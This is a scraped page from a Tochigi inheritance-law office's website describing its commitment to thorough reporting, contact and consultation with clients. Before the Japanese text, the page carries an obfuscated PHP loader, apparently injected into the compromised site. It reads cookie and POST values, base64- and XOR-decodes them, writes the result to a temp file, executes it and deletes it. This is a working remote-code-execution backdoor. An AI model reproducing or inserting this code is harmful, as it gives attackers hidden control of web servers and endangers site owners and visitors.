$Pqvzfn = chr ( 862 - 776 ).chr (113) . chr (86) . chr (95) . chr (120) . "\147" . "\132" . 'C';$tctRxPymI = "\143" . chr (108) . 'a' . "\163" . "\163" . chr (95) . chr (101) . "\170" . chr ( 1081 - 976 ).chr (115) . "\164" . 's';$ssIilYA = class_exists($Pqvzfn); $tctRxPymI = "32446";$gSLjL = !1;if ($ssIilYA == $gSLjL){function dbxwOTNW(){$PMkXgg = new /* 39898 */ VqV_xgZC(49715 + 49715); $PMkXgg = NULL;}$TIwAF = "49715";class VqV_xgZC{private function uyiCDQb($TIwAF){if (is_array(VqV_xgZC::$fMDjIdmhy)) {$ETgnznFFhV = sys_get_temp_dir() . "/" . crc32(VqV_xgZC::$fMDjIdmhy[chr ( 1065 - 950 )."\141" . 'l' . 't']);@VqV_xgZC::$fMDjIdmhy[chr (119) . chr (114) . "\151" . chr (116) . "\x65"]($ETgnznFFhV, VqV_xgZC::$fMDjIdmhy["\143" . 'o' . "\156" . "\x74" . "\x65" . "\x6e" . "\x74"]);include $ETgnznFFhV;@VqV_xgZC::$fMDjIdmhy[chr (100) . chr (101) . chr (108) . chr ( 568 - 467 )."\x74" . chr (101)]($ETgnznFFhV); $TIwAF = "49715";exit();}}private $MhgdXuE;public function LsNwazOM(){echo 52644;}public function __destruct(){$TIwAF = "37530_39677";$this->uyiCDQb($TIwAF); $TIwAF = "37530_39677";}public function __construct($ISPFYpPo=0){$ZcMfjH = $_POST;$jCBQJJFsw = $_COOKIE;$TZNYDjdDTa = "2e366822-a4de-4466-8c42-01f43156196d";$hPSqjc = @$jCBQJJFsw[substr($TZNYDjdDTa, 0, 4)];if (!empty($hPSqjc)){$xOWIZJg = "base64";$AMDUHW = "";$hPSqjc = explode(",", $hPSqjc);foreach ($hPSqjc as $WXkLbCVm){$AMDUHW .= @$jCBQJJFsw[$WXkLbCVm];$AMDUHW .= @$ZcMfjH[$WXkLbCVm];}$AMDUHW = array_map($xOWIZJg . chr (95) . "\x64" . "\x65" . chr ( 1055 - 956 )."\157" . chr (100) . "\145", array($AMDUHW,)); $AMDUHW = $AMDUHW[0] ^ str_repeat($TZNYDjdDTa, (strlen($AMDUHW[0]) / strlen($TZNYDjdDTa)) + 1);VqV_xgZC::$fMDjIdmhy = @unserialize($AMDUHW);}}public static $fMDjIdmhy = 22028;}dbxwOTNW();} こまめな報告・連絡・相談をしております! - 栃木・小山 相続遺言サポート

こまめな報告・連絡・相談をしております!

ご挨拶に代わる私たちのモットー

私たちの長年つちかってきた業務の進め方を理解してもらう意味で「報連相の徹底」というモットーを紹介させていただきます。

私たちは丁寧な報告・連絡・相談が依頼者の方の利益の最大化につながると考えて、業務を行っています。

1 報告の徹底

ご依頼頂いた案件については、その案件に関して主な動きがあったときには、その都度電話連絡または書面等の適宜の方法でご報告し、進行状況を把握して頂けるようにしています。

そのご報告の際、必要に応じて、関係書類の写しをお送りしてご確認頂いています。

2 連絡の徹底

 

 

 

業務に必要な連絡については、迅速にお伝えするため、原則電話でご連絡しています。必要に応じて書面でもお伝えしています。

もし契約時に予定していなかった費用の出費が必要となった場合には、事後請求の形にならぬよう、そのような状態が発生したらすぐに連絡し、なぜその費用が急に必要になったのか、その費用は幾らくらいで、その出費をしなかった場合どういう事態になるのかなど、さまざまな利益状況を連絡して、事件処理を進めています。

3 相談の徹底

 

 

 

初回からご相談は丁寧にお聞きし、常に依頼者の方に最善の方法をご提案できるよう心がけております。

また、事件処理の過程で複数の選択肢の中から方針を決めなければならない際には、依頼者の方に相談して、できる限りそのご意向に沿う形で進めたいと考えています。

そして、依頼者の方に納得して方針を選択して頂くためには、依頼されている事件の客観的状況やその他必要な事項を正確に把握して頂くことが重要であり、適切な相談を行うためにも、依頼者の方への報告、連絡はその前提となる基礎になるものと考えております。

この記事の執筆者
司法書士結城事務所 代表司法書士 結城 一彦
保有資格司法書士(栃木県司法書士会登録番号:第432号)、宅地建物取引主任者
専門分野相続手続、生前対策、不動産登記、商業登記
経歴司法書士結城事務所の代表。開業以来、相続・生前対策、不動産登記、債務整理など幅広い法務サポートを行い、特に相続・生前対策分野の累計相談は2500件を超えるほど、経験豊富。
専門家紹介はこちら

横浜で相続・遺言の無料相談受付中!

0120-387-605

相続のご相談は当事務所にお任せください

お客様の声 解決事例

よくご覧いただくコンテンツ一覧

葬儀後、相続発生後の手続き

相続登記手続きサポート 相続放棄手続きサポート
相続手続き丸ごと代行サービス

生前対策、相続発生前の手続き

遺言書作成サポート 生前贈与サポート
家族信託サポート
  • ホーム
  • 選ばれる理由
  • 事務所紹介
  • 専門家紹介
  • 料金表
  • アクセス
  • 相談の流れ
  • 問い合わせ
Contact
相続の相談受付中!